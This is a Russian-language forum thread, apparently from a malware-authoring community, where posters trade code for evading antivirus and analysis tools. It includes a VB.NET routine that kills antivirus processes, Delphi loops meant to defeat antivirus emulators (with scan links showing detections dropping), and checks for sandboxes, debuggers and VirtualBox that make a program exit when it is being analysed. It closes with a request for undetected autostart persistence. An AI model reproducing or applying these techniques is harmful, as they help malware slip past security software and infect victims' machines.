Anti

[Crash0w3r]

Код:

Dim local As Process() = Process.GetProcesses
Dim i As Integer
For i = 0 To local.Length - 1
Debug.WriteLine(local(i).ProcessName)
If Strings.UCase(local(i).ProcessName) = Strings.UCase("sample") Then 'Anubis
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("outpost") Then 'Outpost
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("npfmsg") Then 'Norman
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("bdagent") Then 'Bitdefender
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("kavsvc") Then 'Kaspersky
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("egui") Then 'Nod32
local(i).Kill()
If Strings.UCase(local(i).ProcessName) = Strings.UCase("zlclient") Then 'Zonealarm
local(i).Kill()
End If
End If
End If
End If
End If
End If
End If
Next

[kingmonstr]

А как же массивы? Хоть что-то интересное?

[St.Patrick]

мож кому пригодится, очень тупое затыкание эмулятора спермского и не только

Код:

  for i := 1 to 1000000 do begin
    Randomize;
    OutputDebugString(Pchar(IntToStr(GetAsyncKeyState(i)+random(1000))));
  end;

пример:
http://scanner.fuckav.ru/report.php?id=51c257c26b150 было
http://scanner.fuckav.ru/report.php?id=51c258a9a8281 стало

спермский и мсье заткнулись. мелочь, а приятно

была еще где-то функция детекта почти всех виртуалок, песочниц, и прочей срани. но я походу проебал ее если найду запилю сюда.

[vazonez]

Цитата:

Сообщение от St.Patrick

мож кому пригодится, очень тупое затыкание эмулятора спермского и не только

Код:

  for i := 1 to 1000000 do begin
    Randomize;
    OutputDebugString(Pchar(IntToStr(GetAsyncKeyState(i)+random(1000))));
  end;

пример:
http://scanner.fuckav.ru/report.php?id=51c257c26b150 было
http://scanner.fuckav.ru/report.php?id=51c258a9a8281 стало

спермский и мсье заткнулись. мелочь, а приятно

была еще где-то функция детекта почти всех виртуалок, песочниц, и прочей срани. но я походу проебал ее если найду запилю сюда.

Лол, такая простень - а MSE нахуй послало.

[hdsckr]

Я делаю почти так же. Только ещё проще.

Цитата:

for i = 0 to 5000

trash.s + "abcdefg" + "abcdefg" + "abcdefg" + "abcdefg"

next

Вобще вырубает любые эмуляторы. Правда проц грузит тож не хило.

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 20 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

[vazonez]

hdsckr
Против анубиса всё еще катит чек параметра "SystemBiosVersion" в HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System - у них там "QEMU" или вроде того.

[upO]

Тру блек-хет метод, спёртый из Оптимы. Набегай!
Детект отладки//виртмашины (спизжено)

Скрытый текст (вы должны войти под своим логином или зарегистрироваться и иметь 20 сообщение(ий)):

У вас нет прав чтобы видеть скрытый текст, содержащейся здесь.

Совсем забыл: юзать по таймеру с интервалом в сотку, ифками.
Соотвественно if isDBG = 1 then ExitProcess(0); // к примеру

*(вообще баян, но если немного подредачить - можно на основе этого что-нибудь да запилить )

[St.Patrick]

upO, всё кривые полу-рабочие баяны)

[upO]

Цитата:

Сообщение от St.Patrick

upO, всё кривые полу-рабочие баяны)

Чекал лично - работает

[St.Patrick]

Цитата:

Сообщение от upO

Чекал лично - работает.

далеко не всё и не всегда..

[upO]

Цитата:

Сообщение от St.Patrick

далеко не всё и не всегда..

Ну чекал на ХР с VirtBox - робило )

[St.Patrick]

ну да, ну да IN EAX, DX в р3 это вообще лол) далее IsInVPC на вистовой ос с урезанными правами скорее всего закончится падением. a IsDebuggerPresent это пиздец товарищи.

[upO]

Ну, не я писал данный метод
Дружно ругаем автора оптимы

[Dark Koder]

upO, а будет продолжение с модулями Graphics,Registry и Alpha-Skin?
Все таки спс что вытянул и дал народу посмеятсо)) это же надо,как ныне обходы пилят.
Интересно,что скажут Апокалипс и Вазонез...

[upO]

Всегда рад доставить немного лулзов

[hdsckr]

Антитрассировка

Цитата:

Procedure antitrace()

EnableASM

#RPL_MASK = %11

Trace.l

MOV cx,#RPL_MASK
PUSH gs
XOR eax,eax
MOV gs,cx
MOV ax,gs
MOV gs,cx
MOV dx,gs
MOV gs,cx
MOV cx,gs
ADD ax,cx
ADD ax,dx
SETZ al
POP gs
MOV Trace,eax



If Trace
INT 3
EndIf

EndProcedure

[St.Patrick]

Код:

if LoadLibraryA(Pchar('VBoxHook.dll')) <> 0 then ExitProcess(0);
if LoadLibraryA(Pchar('VBoxMRXNP.dll')) <> 0 then ExitProcess(0);

детект виртуалбокса, вроде не совсем баян с вмваре так же, только длл другие, не помню какие.

Код:

function IsDBGPresent: boolean; assembler;
asm
  mov eax, large fs:18h
  mov eax, [eax+30h]
  movzx eax, byte ptr [eax+2]
  cmp eax, 1
  jne @ret
  @true:
  mov Result, True
  @ret:
end;

аналог IsDebuggerPresent, но не каждый школьник поймет что это



Добавлено через 16 минут


еще виртуалбокс

Код:

function IsVirtualBox: boolean;
var
  hFile: Thandle;
begin
  Result := False;
  hFile := CreateFileA(Pchar('\\.\VBoxMiniRdrDN'), GENERIC_READ or GENERIC_WRITE, 0, nil, OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL, 0);
  if( hFile <> INVALID_HANDLE_VALUE ) then begin
    CloseHandle(hFile);
    Result := TRUE;
  end;
end;

[mrOrwell]

А как записываться без палева в автозагрузку ? а обычную запись в реест палит дрвеб и прочие антивири - не хорошо получается =(